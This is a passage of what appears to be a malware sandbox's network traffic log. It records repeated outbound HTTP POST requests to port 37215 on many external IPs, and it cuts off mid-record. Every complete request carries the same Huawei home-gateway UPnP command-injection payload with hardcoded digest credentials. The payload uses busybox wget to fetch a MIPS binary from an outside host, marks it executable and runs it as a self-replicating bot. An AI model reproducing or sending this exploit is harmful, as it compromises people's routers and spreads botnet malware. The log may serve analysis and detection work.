                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1886192.168.2.154694841.245.185.14237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.994797945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1887192.168.2.155400041.163.154.8337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.994865894 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1888192.168.2.1544640182.180.172.8137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.994868040 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1889192.168.2.1540790197.184.76.23737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.999376059 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1890192.168.2.1538038197.70.103.3637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.999474049 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1891192.168.2.15599069.188.42.237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.999510050 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1892192.168.2.1553460197.96.171.1637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.999516010 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1893192.168.2.154973441.108.23.13537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.999517918 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1894192.168.2.1556836157.186.26.19037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.999901056 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1895192.168.2.1541334197.65.163.15337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.999943972 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
